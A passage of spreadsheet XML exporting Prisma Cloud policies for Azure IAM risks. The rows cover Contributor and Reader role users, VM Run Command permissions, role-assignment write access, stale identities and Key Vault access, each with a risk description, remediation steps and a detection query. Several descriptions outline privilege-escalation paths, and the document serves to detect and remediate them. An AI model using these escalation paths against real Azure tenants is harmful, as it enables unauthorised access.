      <c r="A3094" t="inlineStr"/>
      <c r="B3094" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3094" s="2" t="inlineStr"/>
      <c r="D3094" t="inlineStr"/>
      <c r="E3094" t="inlineStr"/>
      <c r="F3094" t="inlineStr"/>
      <c r="G3094" t="b">
        <v>1</v>
      </c>
      <c r="H30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4" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J3094" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3094" t="inlineStr">
        <is>
          <t>Azure AD user with the Azure built-in roles of Contributor</t>
        </is>
      </c>
      <c r="L3094" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M3094" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3094" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3094" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3094" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3094" t="inlineStr"/>
      <c r="R3094" t="inlineStr"/>
      <c r="S3094" t="inlineStr"/>
      <c r="T3094" t="b">
        <v>0</v>
      </c>
      <c r="U3094" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3094" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3094" t="inlineStr">
        <is>
          <t>Using the Azure built-in role of Contributor with Azure AD users provides broad permissions sets that can lead to privilege escalation. A few examples are virtual machine lateral movement (like running commands on other VMs), storage account access and configuration access</t>
        </is>
      </c>
      <c r="X3094"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'Contributor' definition role that you want to examine and select the Assignments tab to view all the assignments associated with the selected role
7. Remove user from the list</t>
        </is>
      </c>
      <c r="Y3094" t="inlineStr"/>
      <c r="Z3094" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'Azure' AND source.cloud.resource.type = 'user' AND grantedby.cloud.policy.type = 'Built-in Role' AND grantedby.cloud.policy.name = 'Contributor'</t>
        </is>
      </c>
      <c r="AA3094" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3094" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3094" t="inlineStr"/>
      <c r="AD3094" t="b">
        <v>1</v>
      </c>
      <c r="AE3094" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3094" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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4" t="inlineStr">
        <is>
          <t>b6b547d3-e4cb-4420-83c2-a67f7a74d5f6</t>
        </is>
      </c>
      <c r="AI3094" t="inlineStr">
        <is>
          <t>b6b547d3-e4cb-4420-83c2-a67f7a74d5f6</t>
        </is>
      </c>
      <c r="AJ3094" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3094" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3095">
      <c r="A3095" t="inlineStr"/>
      <c r="B3095" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3095" s="2" t="inlineStr"/>
      <c r="D3095" t="inlineStr"/>
      <c r="E3095" t="inlineStr"/>
      <c r="F3095" t="inlineStr"/>
      <c r="G3095" t="b">
        <v>1</v>
      </c>
      <c r="H30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5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J3095" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3095" t="inlineStr">
        <is>
          <t>Azure VM instance with Run command permissions</t>
        </is>
      </c>
      <c r="L3095" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3095" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3095" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3095" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3095" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3095" t="inlineStr"/>
      <c r="R3095" t="inlineStr"/>
      <c r="S3095" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3095" t="b">
        <v>1</v>
      </c>
      <c r="U3095" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3095" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3095" t="inlineStr">
        <is>
          <t>With access to 'Microsoft.Compute/virtualMachines/runCommands/write','Microsoft.Compute/virtualMachines/runCommand/action' permissions the attacker can execute scripts on any virtual machine within this subscription.</t>
        </is>
      </c>
      <c r="X3095" t="inlineStr">
        <is>
          <t>Remediation steps:
    1. Sign in to Azure Management Console
    2. Navigate to Azure Subscriptions blade at https://portal.azure.com/#blade/Microsoft_Azure_Billing/SubscriptionsBlade
    3. Click on the Azure cloud subscription that you want to examine
    4. Navigate to the “Resources”
    5. FInd the violating VM
    6. In the navigation panel, choose Access control (IAM) and select the Role Assignments tab to access the role bindings available for the selected subscription
    7. Find the assignment between the VM and the role with risky permissions
    8. Remove the assignment
    9. Create a new assignment with a built-in or custom role without risky permissions, if necessary</t>
        </is>
      </c>
      <c r="Y309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5" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AZURE' and source.cloud.service.name = 'Microsoft.Compute' and action.name IN ('Microsoft.Compute/virtualMachines/runCommands/write','Microsoft.Compute/virtualMachines/runCommand/action')</t>
        </is>
      </c>
      <c r="AA3095" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3095" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3095" t="inlineStr"/>
      <c r="AD3095" t="b">
        <v>1</v>
      </c>
      <c r="AE3095" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3095" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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5" t="inlineStr">
        <is>
          <t>2b8e25b0-3067-4128-8b5b-a164966ce50e</t>
        </is>
      </c>
      <c r="AI3095" t="inlineStr">
        <is>
          <t>2b8e25b0-3067-4128-8b5b-a164966ce50e</t>
        </is>
      </c>
      <c r="AJ3095" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3095" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3096">
      <c r="A3096" t="inlineStr"/>
      <c r="B3096" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3096" s="2" t="inlineStr"/>
      <c r="D3096" t="n">
        <v>0</v>
      </c>
      <c r="E3096" t="n">
        <v>0</v>
      </c>
      <c r="F3096" t="n">
        <v>1</v>
      </c>
      <c r="G3096" t="b">
        <v>1</v>
      </c>
      <c r="H30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6" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J3096" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3096" t="inlineStr">
        <is>
          <t>Azure AD user with permissions to manage Azure permissions broadly that was not used in the last 90 days</t>
        </is>
      </c>
      <c r="L3096" t="inlineStr">
        <is>
          <t>UNUSED_PRIVILEGES</t>
        </is>
      </c>
      <c r="M3096" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3096" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3096" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3096" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3096" t="inlineStr"/>
      <c r="R3096" t="inlineStr"/>
      <c r="S3096" t="inlineStr"/>
      <c r="T3096" t="b">
        <v>1</v>
      </c>
      <c r="U3096" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3096" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3096" t="inlineStr">
        <is>
          <t>Azure AD users with the ability to change Azure permissions through role assignments are risky permission that can lead to privilege escalation</t>
        </is>
      </c>
      <c r="X3096"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user and the role with over-privileged permissions
6. Remove the assignment
7. Create a new assignment with built-in or custom role without risky permissions, if necessary</t>
        </is>
      </c>
      <c r="Y309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6" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'Azure' AND source.cloud.resource.type = 'user' AND dest.cloud.resource.name = '*' AND action.name STARTS WITH 'Microsoft.Authorization/roleAssignments/' AND action.lastaccess.days &gt; 90</t>
        </is>
      </c>
      <c r="AA3096" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3096" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3096" t="inlineStr"/>
      <c r="AD3096" t="b">
        <v>1</v>
      </c>
      <c r="AE3096" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3096" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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6" t="inlineStr">
        <is>
          <t>c0a1c364-a2d1-432c-8a0f-b74ae4e09a3c</t>
        </is>
      </c>
      <c r="AI3096" t="inlineStr">
        <is>
          <t>c0a1c364-a2d1-432c-8a0f-b74ae4e09a3c</t>
        </is>
      </c>
      <c r="AJ3096" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3096" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3097">
      <c r="A3097" t="inlineStr"/>
      <c r="B3097" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3097" s="2" t="inlineStr"/>
      <c r="D3097" t="inlineStr"/>
      <c r="E3097" t="inlineStr"/>
      <c r="F3097" t="inlineStr"/>
      <c r="G3097" t="b">
        <v>1</v>
      </c>
      <c r="H30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7" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J3097" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3097" t="inlineStr">
        <is>
          <t>Azure Users and Machine Identities with IAM Metadata Write permissions are unused for 90 days</t>
        </is>
      </c>
      <c r="L3097" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3097" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3097" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3097" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3097" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3097" t="inlineStr"/>
      <c r="R3097" t="inlineStr"/>
      <c r="S3097" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3097" t="b">
        <v>1</v>
      </c>
      <c r="U3097" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3097" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3097" t="inlineStr">
        <is>
          <t>This policy identifies Stale Azure AD Identities with Write Metadata Permissions.
Azure Active Directory (AAD) manages user access in Microsoft Azure. Identities (users or machine identities) with "Write Metadata" permissions can modify virtual machine metadata. While powerful, leaving such identities unused for 90 days creates a security risk:
Dormant Threat: An attacker might exploit inactive credentials to gain access. Once activated, these permissions allow modifying metadata to potentially steal data or install malware on virtual machines.
Privilege Escalation: These permissions could be used to elevate privileges and gain further control within the Azure environment.
Unused privileged accounts are attractive targets for attackers. To mitigate this risk:
Regular Review: Identify and disable unused Azure AD identities with Write Metadata permissions.
Least Privilege: Grant "Write Metadata" only when absolutely necessary and for a limited time. Use Azure RBAC (Role-Based Access Control) for granular control.
MFA Enforcement: Enforce Multi-Factor Authentication (MFA) to add an extra layer of security.</t>
        </is>
      </c>
      <c r="X3097"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09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097" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'Azure' and action.access.level = 'Metadata Write' and action.lastaccess.days &gt; 90</t>
        </is>
      </c>
      <c r="AA3097" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3097" t="inlineStr">
        <is>
          <t>2024-09-27 06:26:54</t>
        </is>
      </c>
      <c r="AC3097" t="inlineStr"/>
      <c r="AD3097" t="b">
        <v>1</v>
      </c>
      <c r="AE3097" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3097" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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7" t="inlineStr">
        <is>
          <t>109e33b5-33ec-4571-9419-edcaa92de3b8</t>
        </is>
      </c>
      <c r="AI3097" t="inlineStr">
        <is>
          <t>109e33b5-33ec-4571-9419-edcaa92de3b8</t>
        </is>
      </c>
      <c r="AJ3097" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3097" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3098">
      <c r="A3098" t="inlineStr"/>
      <c r="B3098" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3098" s="2" t="inlineStr"/>
      <c r="D3098" t="inlineStr"/>
      <c r="E3098" t="inlineStr"/>
      <c r="F3098" t="inlineStr"/>
      <c r="G3098" t="b">
        <v>1</v>
      </c>
      <c r="H30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8" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J3098" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3098" t="inlineStr">
        <is>
          <t>Azure AD user with the Azure built-in roles of Reader</t>
        </is>
      </c>
      <c r="L3098" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M3098" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3098" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3098" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3098" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3098" t="inlineStr"/>
      <c r="R3098" t="inlineStr"/>
      <c r="S3098" t="inlineStr"/>
      <c r="T3098" t="b">
        <v>0</v>
      </c>
      <c r="U3098" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3098" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3098" t="inlineStr">
        <is>
          <t>Using the Azure built-in role of Reader with Azure AD users provides broad permissions sets that can lead to several scenarios of subscription information enumeration</t>
        </is>
      </c>
      <c r="X3098"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'Reader' definition role that you want to examine and select the Assignments tab to view all the assignments associated with the selected role
7. Remove user from the list</t>
        </is>
      </c>
      <c r="Y3098" t="inlineStr"/>
      <c r="Z3098" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'Azure' AND source.cloud.resource.type = 'user' AND grantedby.cloud.policy.type = 'Built-in Role' AND grantedby.cloud.policy.name = 'Reader'</t>
        </is>
      </c>
      <c r="AA3098" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3098" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3098" t="inlineStr"/>
      <c r="AD3098" t="b">
        <v>1</v>
      </c>
      <c r="AE3098" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3098" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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8" t="inlineStr">
        <is>
          <t>c85c9ae3-89c9-4b5c-ba7f-dc81d0d4b3ff</t>
        </is>
      </c>
      <c r="AI3098" t="inlineStr">
        <is>
          <t>c85c9ae3-89c9-4b5c-ba7f-dc81d0d4b3ff</t>
        </is>
      </c>
      <c r="AJ3098" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3098" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3099">
      <c r="A3099" t="inlineStr"/>
      <c r="B3099" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3099" s="2" t="inlineStr"/>
      <c r="D3099" t="inlineStr"/>
      <c r="E3099" t="inlineStr"/>
      <c r="F3099" t="inlineStr"/>
      <c r="G3099" t="b">
        <v>1</v>
      </c>
      <c r="H30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099" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J3099" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3099" t="inlineStr">
        <is>
          <t>Azure AD Groups, Service Principals and Managed Identities with IAM Data Read permissions are unused for 90 days</t>
        </is>
      </c>
      <c r="L3099" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3099" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3099" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3099" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3099" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3099" t="inlineStr"/>
      <c r="R3099" t="inlineStr"/>
      <c r="S3099" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3099" t="b">
        <v>0</v>
      </c>
      <c r="U3099" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3099" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3099" t="inlineStr">
        <is>
          <t>This policy identifies Azure AD Groups, Service Principals, and Managed Identities with Stale Azure RBAC Data Read Permissions.
Risk of Unused Data Read Permissions:
Even seemingly innocuous permissions like "Data Read" in Azure RBAC can be risky if left unused for extended periods. Unused Azure AD groups, service principals, and managed identities with Azure RBAC Data Read permissions for 90 days present a security concern because:
Information Gathering Tool: An attacker with access to these identities could use them to gather sensitive details about your Azure environment. This information could include storage account locations, virtual machine types and configurations, or details about Azure services being utilized. Attackers could exploit this knowledge to identify vulnerabilities or plan more targeted attacks.
Potential Stepping Stone: A compromised unused identity with Data Read permissions could be a stepping stone for attackers. They might leverage this access to discover and exploit further vulnerabilities within your Azure environment, potentially leading to unauthorized access to more sensitive data or systems.
Mitigating the Risk:
Regular Review and Removal: Regularly identify and remove unused Azure AD groups, service principals, and managed identities with any level of Azure RBAC Data Read permissions (Read or Write) on a scheduled basis.
Principle of Least Privilege: Adhere to the principle of least privilege when assigning Azure RBAC permissions. Grant only the minimum level of Data Read access required for an identity to function effectively. Evaluate if alternative methods, like Managed Identity access restrictions or Azure Active Directory Conditional Access, can restrict access to specific resources or services.
Monitor for Suspicious Activity: Utilize Azure Monitor to track activity logs, including access attempts for Azure AD identities. This vigilance can help detect unusual activity related to unused identities that might indicate a compromise.</t>
        </is>
      </c>
      <c r="X3099" t="inlineStr">
        <is>
          <t>Remediation steps:
  1. Sign in to Azure Management Console
  2. Navigate to Azure Subscriptions blade at https://portal.azure.com/#blade/Microsoft_Azure_Billing/SubscriptionsBlade
  3. Click on the Azure cloud subscription that you want to examine
  4. Navigate to the Roles/Groups
  5. Find the assignment between the role/group and the resources that shouldn't have broad access.
  6. Remove the assignment</t>
        </is>
      </c>
      <c r="Y3099" t="inlineStr"/>
      <c r="Z3099" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'Azure' and grantedby.cloud.entity.type NOT IN ('user') and action.access.level = 'Data Read' and action.lastaccess.days &gt; 90</t>
        </is>
      </c>
      <c r="AA3099" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3099" t="inlineStr">
        <is>
          <t>2024-09-27 06:26:54</t>
        </is>
      </c>
      <c r="AC3099" t="inlineStr"/>
      <c r="AD3099" t="b">
        <v>1</v>
      </c>
      <c r="AE3099" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3099" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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099" t="inlineStr">
        <is>
          <t>bb5a2038-4cd0-4946-b5fb-844d46e193a2</t>
        </is>
      </c>
      <c r="AI3099" t="inlineStr">
        <is>
          <t>bb5a2038-4cd0-4946-b5fb-844d46e193a2</t>
        </is>
      </c>
      <c r="AJ3099" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3099" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3100">
      <c r="A3100" t="inlineStr"/>
      <c r="B3100" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3100" s="2" t="inlineStr"/>
      <c r="D3100" t="inlineStr"/>
      <c r="E3100" t="inlineStr"/>
      <c r="F3100" t="inlineStr"/>
      <c r="G3100" t="b">
        <v>1</v>
      </c>
      <c r="H31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0" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J3100" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3100" t="inlineStr">
        <is>
          <t>Azure Users and Machine Identities with Excessive Policies</t>
        </is>
      </c>
      <c r="L3100" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3100" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3100" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3100" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3100" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3100" t="inlineStr"/>
      <c r="R3100" t="inlineStr"/>
      <c r="S3100" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3100" t="b">
        <v>1</v>
      </c>
      <c r="U3100" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3100" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3100" t="inlineStr">
        <is>
          <t>This policy identifies Azure roles that contain '*' in Action, and the level of role assignment is Subscription or higher for Azure.
Roles with '*' in the Action section for a subscription or higher scope (like management group) allow users to perform any action on any resource within that scope. This is risky because:
- Unrestricted Access: Users can bypass security measures and potentially delete critical resources or modify configurations.
- Accidental Damage: Mistakes can have a significant impact, deleting entire resources or services.
- Elevated Attack Surface: A compromised account with such a role gives attackers vast control.</t>
        </is>
      </c>
      <c r="X3100"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10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100" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'Azure' and grantedby.level.type IN ( 'Azure Management Group' , 'Azure Subscription' ) and grantedby.cloud.policy.isexcessive = true</t>
        </is>
      </c>
      <c r="AA3100" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3100" t="inlineStr">
        <is>
          <t>2024-09-27 06:26:54</t>
        </is>
      </c>
      <c r="AC3100" t="inlineStr"/>
      <c r="AD3100" t="b">
        <v>1</v>
      </c>
      <c r="AE3100" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3100" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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0" t="inlineStr">
        <is>
          <t>ed4f28ea-4e84-4e55-bf61-249113079da1</t>
        </is>
      </c>
      <c r="AI3100" t="inlineStr">
        <is>
          <t>ed4f28ea-4e84-4e55-bf61-249113079da1</t>
        </is>
      </c>
      <c r="AJ3100" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3100" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3101">
      <c r="A3101" t="inlineStr"/>
      <c r="B3101" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3101" s="2" t="inlineStr"/>
      <c r="D3101" t="inlineStr"/>
      <c r="E3101" t="inlineStr"/>
      <c r="F3101" t="inlineStr"/>
      <c r="G3101" t="b">
        <v>1</v>
      </c>
      <c r="H31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1" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J3101" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3101" t="inlineStr">
        <is>
          <t>Azure Compute Resource Assigned Role &amp; Role Assignment Related Permissions Which Could Lead to Privilege Escalation</t>
        </is>
      </c>
      <c r="L3101" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3101" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3101" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3101" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3101" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3101" t="inlineStr"/>
      <c r="R3101" t="inlineStr"/>
      <c r="S3101" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3101" t="b">
        <v>1</v>
      </c>
      <c r="U3101" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3101" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3101" t="inlineStr">
        <is>
          <t>An adversary able to edit role assignments or role definitions could grant themselves additional roles, or grant additional permissions to roles they already have access to, escalating their privileges within the environment. This would allow them to further enumerate and exploite the environment.</t>
        </is>
      </c>
      <c r="X3101" t="inlineStr">
        <is>
          <t>Remediation steps:
 1. Sign in to Azure Console
 2.Navigate to the Compute instance, and remove the attached role, or edit it and remove the excessive permissions.</t>
        </is>
      </c>
      <c r="Y310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101" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AZURE' AND source.cloud.type = 'AZURE' AND source.cloud.service.name = 'Microsoft.Compute' AND source.cloud.resource.type = 'VirtualMachines' and action.name IN ('Microsoft.Authorization/roleAssignments/write', 'Microsoft.Authorization/roleDefinitions/write')</t>
        </is>
      </c>
      <c r="AA3101" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3101" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3101" t="inlineStr"/>
      <c r="AD3101" t="b">
        <v>1</v>
      </c>
      <c r="AE3101" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3101" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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1" t="inlineStr">
        <is>
          <t>279e08a8-990f-4e7d-8d79-9bffced0d3fa</t>
        </is>
      </c>
      <c r="AI3101" t="inlineStr">
        <is>
          <t>279e08a8-990f-4e7d-8d79-9bffced0d3fa</t>
        </is>
      </c>
      <c r="AJ3101" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3101" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3102">
      <c r="A3102" t="inlineStr"/>
      <c r="B3102" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3102" s="2" t="inlineStr"/>
      <c r="D3102" t="inlineStr"/>
      <c r="E3102" t="inlineStr"/>
      <c r="F3102" t="inlineStr"/>
      <c r="G3102" t="b">
        <v>1</v>
      </c>
      <c r="H31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2" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J3102" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3102" t="inlineStr">
        <is>
          <t>Azure Service Principals with broad Key Vault management access</t>
        </is>
      </c>
      <c r="L3102" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3102" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3102" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3102" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3102" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3102" t="inlineStr"/>
      <c r="R3102" t="inlineStr"/>
      <c r="S3102" t="inlineStr"/>
      <c r="T3102" t="b">
        <v>0</v>
      </c>
      <c r="U3102" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3102" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3102" t="inlineStr">
        <is>
          <t>Service Principles provide an automatic way for applications to connect to resources that support Azure Active Directory (Azure AD) authentication. Providing Key Vault management access lets non-human identities manage key vaults. The least privilege model should be enforced and unused sensitive permissions should be revoked</t>
        </is>
      </c>
      <c r="X3102"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and the role with permissions to Microsoft KeyVault
    6. Remove the assignment
    7. Create a new assignment with built-in or custom role without risky permissions and/or scoped down to only the Key Vaults that this identity requires access to, if necessary</t>
        </is>
